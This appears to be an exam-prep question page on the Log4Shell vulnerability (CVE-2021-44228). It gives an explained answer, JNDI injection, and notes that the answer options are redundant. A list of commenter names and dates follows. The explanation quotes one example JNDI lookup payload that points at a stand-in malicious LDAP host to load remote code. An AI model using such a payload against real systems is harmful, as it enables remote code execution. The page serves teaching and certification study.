In the context of the infamous log4j vulnerability (CVE-2021-44228), which vulnerability is exploited in the backend to achieve Remote Code Execution?
The Log4j vulnerability, identified as CVE-2021-44228 (commonly known as Log4Shell), is a critical security flaw in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability allows remote code execution (RCE) when an attacker crafts a malicious input (e.g., ${jndi:ldap://malicious.com/a}) that is logged by a vulnerable Log4j instance. The exploit leverages JNDI (Java Naming and Directory Interface) Injection, where the JNDI lookup mechanism is abused to load remote code from an attacker-controlled server. All options (A, B, and C) list 'JNDI Injection,' which is correct, but since B is marked as the selected answer in the image, it is taken as the intended choice. This redundancy in options suggests a possible error in the question design, but the vulnerability is unequivocally JNDI Injection. Option D ('None of the above') is incorrect as JNDI Injection is the exploited vulnerability. This topic is critical in the CAP syllabus under injection attacks and RCE prevention.
Edwin
5 months agoBeckie
5 months agoErnest
5 months agoCristy
6 months agoLea
6 months agoJoni
6 months agoColby
6 months agoGregoria
7 months agoMarti
7 months agoJoye
7 months agoRory
7 months agoNoah
7 months agoXochitl
8 months agoRosita
8 months agoMichael
10 months agoRonald
10 months agoAhmed
10 months agoKami
8 months agoJennifer
9 months agoMarguerita
9 months agoCarmela
10 months agoSanda
11 months agoBettyann
11 months agoLonny
9 months agoWava
10 months agoAmie
10 months agoMarva
11 months agoMerissa
11 months agoReta
10 months agoFausto
10 months agoMing
10 months agoLouvenia
11 months ago